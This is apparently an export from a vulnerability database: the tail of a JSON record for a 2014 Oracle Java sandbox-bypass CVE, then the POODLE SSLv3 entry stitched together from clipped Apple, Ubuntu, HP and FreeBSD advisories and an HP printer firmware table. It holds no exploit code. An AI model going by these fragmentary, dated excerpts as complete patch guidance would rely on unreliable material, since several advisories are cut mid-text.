"http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1569" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1724" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3558" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5797" }, { "trust": 0.1, "url": "http://security.gentoo.org/" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5070" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1486" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2472" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0446" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0453" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3860" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1488" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0502" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3561" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0868" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0440" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0443" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3389" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5814" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5817" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4351" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3551" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2455" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3557" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5089" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openjdk-7/7u55-2.4.7-1ubuntu1" }, { "trust": 0.1, "url": "https://launchpad.net/bugs/1283828" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openjdk-7/7u55-2.4.7-1ubuntu1~0.12.10.1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openjdk-7/7u55-2.4.7-1ubuntu1~0.13.10.1" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2014-0407.html" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2014-0509.html" }, { "trust": 0.1, "url": "https://www.ibm.com/developerworks/java/jdk/alerts/" }, { "trust": 0.1, "url": "http://www.debian.org/security/faq" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0462" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2405" }, { "trust": 0.1, "url": "http://www.debian.org/security/" } ], "sources": [ { "db": "ZDI", "id": "ZDI-14-105" }, { "db": "VULHUB", "id": "VHN-67950" }, { "db": "VULMON", "id": "CVE-2014-0457" }, { "db": "BID", "id": "66866" }, { "db": "PACKETSTORM", "id": "126200" }, { "db": "PACKETSTORM", "id": "126201" }, { "db": "PACKETSTORM", "id": "127267" }, { "db": "PACKETSTORM", "id": "126413" }, { "db": "PACKETSTORM", "id": "127041" }, { "db": "PACKETSTORM", "id": "126181" }, { "db": "PACKETSTORM", "id": "126630" }, { "db": "PACKETSTORM", "id": "126320" }, { "db": "CNNVD", "id": "CNNVD-201404-272" }, { "db": "NVD", "id": "CVE-2014-0457" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "ZDI", "id": "ZDI-14-105" }, { "db": "VULHUB", "id": "VHN-67950" }, { "db": "VULMON", "id": "CVE-2014-0457" }, { "db": "BID", "id": "66866" }, { "db": "PACKETSTORM", "id": "126200" }, { "db": "PACKETSTORM", "id": "126201" }, { "db": "PACKETSTORM", "id": "127267" }, { "db": "PACKETSTORM", "id": "126413" }, { "db": "PACKETSTORM", "id": "127041" }, { "db": "PACKETSTORM", "id": "126181" }, { "db": "PACKETSTORM", "id": "126630" }, { "db": "PACKETSTORM", "id": "126320" }, { "db": "CNNVD", "id": "CNNVD-201404-272" }, { "db": "NVD", "id": "CVE-2014-0457" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-04-21T00:00:00", "db": "ZDI", "id": "ZDI-14-105" }, { "date": "2014-04-16T00:00:00", "db": "VULHUB", "id": "VHN-67950" }, { "date": "2014-04-16T00:00:00", "db": "VULMON", "id": "CVE-2014-0457" }, { "date": "2014-04-15T00:00:00", "db": "BID", "id": "66866" }, { "date": "2014-04-17T22:02:41", "db": "PACKETSTORM", "id": "126200" }, { "date": "2014-04-17T22:02:50", "db": "PACKETSTORM", "id": "126201" }, { "date": "2014-06-30T23:39:28", "db": "PACKETSTORM", "id": "127267" }, { "date": "2014-05-01T02:15:00", "db": "PACKETSTORM", "id": "126413" }, { "date": "2014-06-11T00:10:43", "db": "PACKETSTORM", "id": "127041" }, { "date": "2014-04-16T20:41:55", "db": "PACKETSTORM", "id": "126181" }, { "date": "2014-05-15T21:38:36", "db": "PACKETSTORM", "id": "126630" }, { "date": "2014-04-25T17:49:43", "db": "PACKETSTORM", "id": "126320" }, { "date": "2014-04-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201404-272" }, { "date": "2014-04-16T01:55:09.820000", "db": "NVD", "id": "CVE-2014-0457" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-04-21T00:00:00", "db": "ZDI", "id": "ZDI-14-105" }, { "date": "2022-05-09T00:00:00", "db": "VULHUB", "id": "VHN-67950" }, { "date": "2020-09-08T00:00:00", "db": "VULMON", "id": "CVE-2014-0457" }, { "date": "2015-04-13T21:56:00", "db": "BID", "id": "66866" }, { "date": "2014-04-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201404-272" }, { "date": "2022-05-13T14:57:20.540000", "db": "NVD", "id": "CVE-2014-0457" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "127041" }, { "db": "PACKETSTORM", "id": "126181" }, { "db": "CNNVD", "id": "CNNVD-201404-272" } ], "trust": 0.8 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Oracle Java ScriptEngineManager Sandbox Bypass Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-14-105" } ], "trust": 0.7 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "lack of information", "sources": [ { "db": "CNNVD", "id": "CNNVD-201404-272" } ], "trust": 0.6 } }
var-201410-1418
Vulnerability from variot
The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack, aka the "POODLE" issue. SSL protocol is the abbreviation of Secure Socket Layer protocol (Secure Socket Layer) developed by Netscape, which provides security and data integrity guarantee for Internet communication. There is a security vulnerability in the SSL protocol 3.0 version used in OpenSSL 1.0.1i and earlier versions. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
APPLE-SA-2014-10-16-4 OS X Server v3.2.2
OS X Server v3.2.2 is now available and addresses the following:
Server Available for: OS X Mavericks v10.9.5 or later Impact: An attacker may be able to decrypt data protected by SSL Description: There are known attacks on the confidentiality of SSL 3.0 when a cipher suite uses a block cipher in CBC mode. An attacker could force the use of SSL 3.0, even when the server would support a better TLS version, by blocking TLS 1.0 and higher connection attempts. This issue was addressed by disabling SSL 3.0 support in Web Server, Calendar & Contacts Server, and Remote Administration. CVE-ID CVE-2014-3566 : Bodo Moeller, Thai Duong, and Krzysztof Kotowicz of Google Security Team
OS X Server v3.2.2 may be obtained from the Mac App Store. HP Storage Data Protector Cell Manager v8 before v8.13_206 and v9 before v9.03MMR running on HP-UX 11i, Windows Server 2008/2008R2/2012/2012R2, Redhat, CentOS, Oracle Linux, and SUSE Linux_x64. ============================================================================ Ubuntu Security Notice USN-2486-1 January 27, 2015
openjdk-6 vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in OpenJDK 6.
Software Description: - openjdk-6: Open Source Java implementation
Details:
Several vulnerabilities were discovered in the OpenJDK JRE related to information disclosure, data integrity and availability. An attacker could exploit these to expose sensitive data over the network. An attacker could exploit this to expose sensitive data over the network. (CVE-2014-6593)
A vulnerability was discovered in the OpenJDK JRE related to integrity and availability. (CVE-2015-0383)
A vulnerability was discovered in the OpenJDK JRE related to availability. (CVE-2015-0410)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 12.04 LTS: icedtea-6-jre-cacao 6b34-1.13.6-1ubuntu0.12.04.1 icedtea-6-jre-jamvm 6b34-1.13.6-1ubuntu0.12.04.1 openjdk-6-jre 6b34-1.13.6-1ubuntu0.12.04.1 openjdk-6-jre-headless 6b34-1.13.6-1ubuntu0.12.04.1 openjdk-6-jre-lib 6b34-1.13.6-1ubuntu0.12.04.1 openjdk-6-jre-zero 6b34-1.13.6-1ubuntu0.12.04.1
Ubuntu 10.04 LTS: icedtea-6-jre-cacao 6b34-1.13.6-1ubuntu0.10.04.1 openjdk-6-jre 6b34-1.13.6-1ubuntu0.10.04.1 openjdk-6-jre-headless 6b34-1.13.6-1ubuntu0.10.04.1 openjdk-6-jre-lib 6b34-1.13.6-1ubuntu0.10.04.1 openjdk-6-jre-zero 6b34-1.13.6-1ubuntu0.10.04.1
This update uses a new upstream release, which includes additional bug fixes. After a standard system update you need to restart any Java applications or applets to make all the necessary changes.
References: http://www.ubuntu.com/usn/usn-2486-1 CVE-2014-3566, CVE-2014-6585, CVE-2014-6587, CVE-2014-6591, CVE-2014-6593, CVE-2014-6601, CVE-2015-0383, CVE-2015-0395, CVE-2015-0400, CVE-2015-0407, CVE-2015-0408, CVE-2015-0410, CVE-2015-0412
Package Information: https://launchpad.net/ubuntu/+source/openjdk-6/6b34-1.13.6-1ubuntu0.12.04.1 https://launchpad.net/ubuntu/+source/openjdk-6/6b34-1.13.6-1ubuntu0.10.04.1 . A second vulnerability could be exploited remotely to cause a Denial of Service (DoS).
Contact vcemsdksupportteam@hp.com to request the HP Virtual Connect Enterprise Manager SDK v7.4.1 or later. The vulnerabilities may lead to remote disclosure of information.
The update is available from HPE Software Depot: https://h20392.www2.hpe.com/ portal/swdepot/displayProductInfo.do?productNumber=HPVPRhttps://www.hpe.com
Note: HPE recommends customers using OV4VC 7.8.1 and earlier should upgrade to OV4VC 7.8.2. This addresses all SSL security vulnerabilities reported through March 28, 2016.
SSLv3 is enabled by default in all version 5 HP Insight Remote Support Clients. HP recommends that customers, if possible, should migrate to Insight Remote Support Version 7.2 which has been updated with a preliminary resolution to the vulnerability. This bulletin will be revised when the final resolution update is available.
Please refer to the following Insight Remote Support Version 7.2 documents for recommendations on migrating to Insight Remote Support Version 7.2:
http://www.hp.com/go/insightremotesupport/docs
HP Insight Remote Support 7.2 Upgrade Guide
HP Insight Remote Support 7.2 Release Notes
HISTORY Version:1 (rev.1) - 5 December 2014 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
============================================================================= FreeBSD-SA-14:23.openssl Security Advisory The FreeBSD Project
Topic: OpenSSL multiple vulnerabilities
Category: contrib Module: openssl Announced: 2014-10-21 Affects: All supported versions of FreeBSD. Corrected: 2014-10-15 19:59:43 UTC (stable/10, 10.1-PRERELEASE) 2014-10-21 19:00:32 UTC (releng/10.1, 10.1-RC3) 2014-10-21 19:00:32 UTC (releng/10.1, 10.1-RC2-p1) 2014-10-21 19:00:32 UTC (releng/10.1, 10.1-RC1-p1) 2014-10-21 19:00:32 UTC (releng/10.1, 10.1-BETA3-p1) 2014-10-21 20:21:10 UTC (releng/10.0, 10.0-RELEASE-p10) 2014-10-15 20:28:31 UTC (stable/9, 9.3-STABLE) 2014-10-21 20:21:10 UTC (releng/9.3, 9.3-RELEASE-p3) 2014-10-21 20:21:10 UTC (releng/9.2, 9.2-RELEASE-p13) 2014-10-21 20:21:10 UTC (releng/9.1, 9.1-RELEASE-p20) 2014-10-15 20:28:31 UTC (stable/8, 8.4-STABLE) 2014-10-21 20:21:27 UTC (releng/8.4, 8.4-RELEASE-p17) CVE Name: CVE-2014-3513, CVE-2014-3566, CVE-2014-3567, CVE-2014-3568
For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit
I. Background
FreeBSD includes software from the OpenSSL Project. The OpenSSL Project is a collaborative effort to develop a robust, commercial-grade, full-featured Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols as well as a full-strength general purpose cryptography library.
II. Problem Description
A flaw in the DTLS SRTP extension parsing code allows an attacker, who sends a carefully crafted handshake message, to cause OpenSSL to fail to free up to 64k of memory causing a memory leak. [CVE-2014-3513].
When an OpenSSL SSL/TLS/DTLS server receives a session ticket the integrity of that ticket is first verified. In the event of a session ticket integrity check failing, OpenSSL will fail to free memory causing a memory leak. [CVE-2014-3567]. This protocol weakness makes it possible for an attacker to obtain clear text data through a padding-oracle attack.
Some client applications (such as browsers) will reconnect using a downgraded protocol to work around interoperability bugs in older servers. This could be exploited by an active man-in-the-middle to downgrade connections to SSL 3.0 even if both sides of the connection support higher protocols. SSL 3.0 contains a number of weaknesses including POODLE [CVE-2014-3566].
OpenSSL has added support for TLS_FALLBACK_SCSV to allow applications to block the ability for a MITM attacker to force a protocol downgrade.
When OpenSSL is configured with "no-ssl3" as a build option, servers could accept and complete a SSL 3.0 handshake, and clients could be configured to send them. [CVE-2014-3568].
III. Impact
A remote attacker can cause Denial of Service with OpenSSL 1.0.1 server implementations for both SSL/TLS and DTLS regardless of whether SRTP is used or configured. [CVE-2014-3513]
By sending a large number of invalid session tickets an attacker could exploit this issue in a Denial Of Service attack. [CVE-2014-3567].
An active man-in-the-middle attacker can force a protocol downgrade to SSLv3 and exploit the weakness of SSLv3 to obtain clear text data from the connection. [CVE-2014-3566] [CVE-2014-3568]
IV. Workaround
No workaround is available.
V. Solution
Perform one of the following:
1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date.
2) To update your vulnerable system via a binary patch:
Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility:
freebsd-update fetch
freebsd-update install
3) To update your vulnerable system via a source code patch:
The following patches have been verified to apply to the applicable FreeBSD release branches.
a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.
[FreeBSD 10.0]
fetch http://security.FreeBSD.org/patches/SA-14:23/openssl-10.0.patch
fetch http://security.FreeBSD.org/patches/SA-14:23/openssl-10.0.patch.asc
gpg --verify openssl-10.0.patch.asc
[FreeBSD 9.3]
fetch http://security.FreeBSD.org/patches/SA-14:23/openssl-9.3.patch
fetch http://security.FreeBSD.org/patches/SA-14:23/openssl-9.3.patch.asc
gpg --verify openssl-9.3.patch.asc
[FreeBSD 8.4, 9.1 and 9.2]
fetch http://security.FreeBSD.org/patches/SA-14:23/openssl-8.4.patch
fetch http://security.FreeBSD.org/patches/SA-14:23/openssl-8.4.patch.asc
gpg --verify openssl-8.4.patch.asc
b) Apply the patch. Execute the following commands as root:
cd /usr/src
patch < /path/to/patch
c) Recompile the operating system using buildworld and installworld as
described in
Restart all deamons using the library, or reboot the system.
VI. Correction details
The following list contains the correction revision numbers for each affected branch.
Branch/path Revision
stable/8/ r273151 releng/8.4/ r273416 stable/9/ r273151 releng/9.1/ r273415 releng/9.2/ r273415 releng/9.3/ r273415 stable/10/ r273149 releng/10.0/ r273415 releng/10.1/ r273399
To see which files were modified by a particular revision, run the following command, replacing NNNNNN with the revision number, on a machine with Subversion installed:
svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base
Or visit the following URL, replacing NNNNNN with the revision number:
VII. References
The latest revision of this advisory is available at
iQIcBAEBAgAGBQJURsSwAAoJEO1n7NZdz2rn3ekQANG9DnAGJq/yAXXtX4wdeP08 Ep35L3dkxJsthoqJhn7fc/pra5SZ5iS7NCRHdh5Xn1dsxRiOsffYt9zanWyTOgj+ RQy9jiNp0oIWQEkxZVoHMIKn6VeQk1I2llSXyERANjeDtKX6GV2gV+Zd4tcExW4T Nn9jVHgkDL/doxJ3C1K0BrkdoEEwyPohAf8WLAg6ZKRm3Pys1Ewjm6fPBPtKUIEu zWFruP5xFz3rM6i/4zcihj7b4BuIKtUBgHf28rgf0I3TKZTr75Xr9h4q/8ZG4H0G Lk/1OoZTiMyjlBLufpTlCOdODjz7ORzDLif47Zyt52iZowq1hl4WO7Xo/C/kPUmG o631wsLmO9tPS2Z0TmIQm1fwjlTvIZefZAlMpa1lDwnwZx2hRsu9TzauACdSbuWx 9i+e8/CSMEsr0qJo8KXjltpV9siULhkvl9xr3PwxMfvHFjGUAuur2zHUoTQZTpy0 nKJJXSs3kIW/4ivLMDuDYijdVnf4hrih6GTKEND6aNXtyXitiFK8J4a/q0T4BBnh 89A2QUFVeeDPmf7jzMh824s8W2uoPFGJqHgdtqv1bLT29rqh5ya/5zi7sci6Q/Mk ov0U8X3Pwun7iwJDeYG6N38lUSdMqImHR12Ay7pOY04i4qau4Yf8B26lwcMk/HrU cZ84y1sCp0qHtTqKuak9 =ywze -----END PGP SIGNATURE----- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04720842
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04720842 Version: 1
HPSBPI03107 rev.1 - HP LaserJet Printers and MFPs, HP OfficeJet Printers and MFPs, and HP JetDirect Networking cards using OpenSSL, Remote Disclosure of Information
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2015-06-26 Last Updated: 2015-06-26
Potential Security Impact: Remote disclosure of information
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY A potential security vulnerability has been identified with certain HP LaserJet Printers and MFPs, certain HP OfficeJet Printers and MFPs, and certain HP JetDirect Networking cards using OpenSSL. This is the SSLv3 vulnerability known as "Padding Oracle on Downgraded Legacy Encryption" or "POODLE", which could be exploited remotely to allow disclosure of information.
References:
CVE-2014-3566 (SSRT101114)
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. Please refer to the RESOLUTION below for a list of impacted products.
Note: all product versions are impacted prior to the fixed versions listed.
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2014-3566 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION HP has provided firmware updates for impacted printers as in the table below. To obtain the updated firmware, go to www.hp.com and follow these steps:
Select "Drivers & Software". Enter the appropriate product name listed in the table below into the search field. Click on "Search". Click on the appropriate product. Under "Select operating system" click on "Cross operating system (BIOS, Firmware, Diagnostics, etc.)" Note: If the "Cross operating system ..." link is not present, select applicable Windows operating system from the list. Select the appropriate firmware update under "Firmware".
Firmware Updates Table
Product Name Model Number Firmware Revision
HP Color LaserJet CP5525 CE707A,CE708A,CE709A 2305081_000127 (or higher)
HP Color LaserJet Enterprise M552 B5L23A 2305076_518484 (or higher)
HP Color LaserJet Enterprise M553 B5L24A, B5L25A, B5L26A 2305076_518484 (or higher)
HP Color LaserJet Enterprise M651 CZ255A, CZ256A, CZ257A, CZ258A 2305076_518492 (or higher)
HP Color LaserJet Enterprise M750 D3L08A, D3L09A, D3L10A 2305081_000144 (or higher)
HP Color LaserJet M680 CZ250A, CA251A 2305076_518489 (or higher)
HP LaserJet Enterprise 500 color MFP M575dn CD644A, CD645A 2305076_518499 (or higher)
HP LaserJet Enterprise 500 MFP M525f CF116A, CF117A 2305076_518487 (or higher)
HP LaserJet Enterprise 600 M601 CE989A, CE990A 2305083_000199 (or higher)
HP LaserJet Enterprise 600 M602 CE991A, CE992A, CE993A 2305083_000199 (or higher)
HP LaserJet Enterprise 600 M603xh CE994A, CE995A, CE996A 2305083_000199 (or higher)
HP LaserJet Enterprise 700 color MFP M775 series CC522A, CC523A, CC524A 2305076_518498 (or higher)
HP LaserJet Enterprise 700 M712xh CF235A, CF236A, CF238A 2305083_000196 (or higher)
HP LaserJet Enterprise 800 color M855 A2W77A, A2W78A, A2W79A 2305076_518493 (or higher)
HP LaserJet Enterprise 800 color MFP M880 A2W76A, A2W75A, D7P70A, D7P71A 2305076_518488 (or higher)
HP LaserJet Enterprise Color 500 M551 Series CF081A,CF082A,CF083A 2305083_000200 (or higher)
HP LaserJet Enterprise Color flow MFP M575c CD646A 2305076_518499 (or higher)
HP LaserJet Enterprise flow M830z MFP CF367A 2305076_518490 (or higher)
HP LaserJet Enterprise flow MFP M525c CF118A 2305076_518487 (or higher)
HP LaserJet Enterprise Flow MFP M630z B3G85A 2305076_518483 (or higher)
HP LaserJet Enterprise M4555 MFP CE503A, CE504A, CE738A 2305083_000222 (or higher)
HP Color LaserJet CM4540 MFP CC419A, CC420A, CC421A 2305083_000206 (or higher)
HP LaserJet Enterprise M604 E6B67A, E6B68A 2305076_518485 (or higher)
HP LaserJet Enterprise M605 E6B69A, E6B70A. E6B71A 2305076_518485 (or higher)
HP LaserJet Enterprise M606 E6B72A, E6B73A 2305076_518485 (or higher)
HP LaserJet Enterprise M806 CZ244A, CZ245A 2305081_000143 (or higher)
HP LaserJet Enterprise MFP M630 J7X28A 2305076_518483 (or higher)
HP LaserJet Enterprise MFP M725 CF066A, CF067A, CF068A, CF069A 2305076_518496 (or higher)
HP Scanjet Enterprise 8500FN1 Document Capture Workstation L2717A 2305076_518479 (or higher)
HP OfficeJet Enterprise Color X555 C2S11A, C2S12A 2305076_518491 (or higher)
HP OfficeJet Enterprise Color MFP X585 B5L04A, B5L05A,B5L07A 2305076_518486 (or higher)
HP LaserJet P3005 Q7812A 02.190.3 (or higher)
HP Color LaserJet CP3505 CB442A 03.160.2 (or higher)
HP LaserJet 5200L Q7543A 08.241.0 (or higher)
HP LaserJet 5200N Q7543A 08.241.0 (or higher)
HP LaserJet 4240 Q7785A 08.250.2 (or higher)
HP LaserJet 4250 Q5400A 08.250.2 (or higher)
HP LaserJet 4350 Q5407A 08.250.2 (or higher)
HP LaserJet 9040 Q7697A 08.260.3 (or higher)
HP LaserJet 9050 Q7697A 08.260.3 (or higher)
HP LaserJet 9040 Multifunction Printer Q3721A 08.290.2 (or higher)
HP LaserJet 9050 Multifunction Printer Q3721A 08.290.2 (or higher)
HP 9200c Digital Sender Q5916A 09.271.3 (or higher)
HP LaserJet 4345 Multifunction Printer Q3942A 09.310.2 (or higher)
HP LaserJet P2055 Printer CE456A, CE457A, CE459A, CE460A, 20141201 (or higher)
HP Color LaserJet 3000 Q7534A 46.080.2 (or higher)
HP Color LaserJet 3800 Q5981A 46.080.8 (or higher)
HP Color LaserJet 4700 Q7492A 46.230.6 (or higher)
HP Color LaserJet CP4005 CB503A 46.230.6 (or higher)
HP Color LaserJet 4730 Multifunction Printer Q7517A 46.380.3 (or higher)
HP LaserJet Pro 200 color Printer M251n, nw CF146A, CF147A 20150112 (or higher)
HP LaserJet Pro 500 color MFP M570dn, dw CZ271A, CZ272A 20150112 (or higher)
HP LaserJet Pro M521dn, dw MFP A8P79A, A8P80A 20150112 (or higher)
HP Color LaserJet Pro MFP M476dn, dw, nw CF385A, CF386A, CF387A 20150112 (or higher)
HP LaserJet Pro 400 MFP M425dn, dw CF286A, CF28A 20150112 (or higher)
HP LaserJet Pro 200 color MFP M276n, nw CF144A, CF145A 20150112 (or higher)
HP LaserJet Pro 400 M401a, d, dn, dne, dw, n CF270A, CF274A, CF278A, CF399A, CF285A, CZ195A 20150112 (or higher)
HP LaserJet Pro P1566 Printer CE663A, CE749A 20150116 (or higher)
HP LaserJet Pro 300 Color MFP M375nw CE903A 20150126 (or higher)
HP LaserJet Pro 400 Color MFP M475dn, dw CE863A, CE864A 20150126 (or higher)
HP TopShot LaserJet Pro M275 MFP CF040A 20150126 (or higher)
HP LaserJet 300 color M351a CE955A 20150126 (or higher)
HP LaserJet 400 color M451dn, dw, nw CE956A, CE957A, CE958A 20150126 (or higher)
HP LaserJet Pro MFP M125a CZ172A 20150214 (or higher)
HP LaserJet Pro MFP M126a CZ174A 20150215 (or higher)
HP LaserJet Pro MFP M125nw CZ173A 20150228 (or higher)
HP LaserJet Pro MFP M126nw CZ175A 20150228 (or higher)
HP LaserJet Pro MFP M127fn, fw CZ181A, CZ183A 20150228 (or higher)
HP LaserJet Pro MFP M128fn, fp, fw CZ184A, CZ185A, CZ186A 20150228 (or higher)
HP Color LaserJet Pro MFP M176n, fw CF547A, CZ165A 20150228 (or higher)
HP LaserJet Pro P1102, w CE651A, CE657A 20150313 (or higher)
HP LaserJet Pro P1106 CE653A 20150313 (or higher)
HP LaserJet Pro P1108 CE655A 20150313 (or higher)
LaserJet Pro M435nw MFP A3E42A 20150316 (or higher)
HP LaserJet Pro M701a, n B6S00A, B6S01A 20150316 (or higher)
HP LaserJet Pro M706n B6S02A 20150316 (or higher)
HP LaserJet Professional M1212nf MFP CE841A 20150405 (or higher)
HP LaserJet Professional M1213nf MFP CE845A 20150405 (or higher)
HP LaserJet Professional M1214nfh MFP CE843A 20150405 (or higher)
HP LaserJet Professional M1216nfh MFP CE842A 20150405 (or higher)
HP LaserJet Professional M1217nfw MFP CE844A 20150405 (or higher)
HP HotSpot LaserJet Pro M1218nfs MFP B4K88A 20150405 (or higher)
HP LaserJet Professional M1219nf MFP CE846A 20150405 (or higher)
HP LaserJet Pro CP1025, nw CE913A, CE914A, CF346A, CF346A 20150413 (or higher)
HP Officejet Pro X451dn Printer CN459A BNP1CN1502AR (or higher)
HP Officejet Pro X451dw Printer CN463A BWP1CN1502AR (or higher)
HP Officejet Pro X551dw Printer CV037A BZP1CN1502AR (or higher)
HP Officejet Pro X476dn MFP CN460A LNP1CN1502BR (or higher)
HP Officejet Pro X476dw MFP CN461A LWP1CN1502BR (or higher)
HP Officejet Pro X576dw MFP CN598A LZP1CN1502BR (or higher)
HP Officejet Pro 276dw MFP CR770A FRP1CN1517AR (or higher)
HP Officejet Pro 8610/15/16 e-All-in-One Printer A7F64A, D7Z36A, J5T77A FDP1CN1502AR (or higher)
HP Officejet Pro 8620/25 e-All-in-One Printer A7F65A, D7Z37A FDP1CN1502AR (or higher)
HP Officejet Pro 8630 e-All-in-One Printer A7F66A FDP1CN1502AR (or higher)
HP Jetdirect 620n EIO Card J7934G V29.26 (or higher)
HP Jetdirect ew2500 802.11b/g Wireless Print Server J8021A V41.16 (or higher)
HP Jetdirect 690n EIO Card J8007A V41.16 (or higher)
HP Jetdirect 635n EIO Card J7961G V41.16 (or higher)
HP Jetdirect 695n EIO Card J8024A V41.16 (or higher)
HP Jetdirect 640n EIO Card J8025A V45.35 (or higher)
HISTORY Version:1 (rev.1) - 26 June 2015 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2015 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners
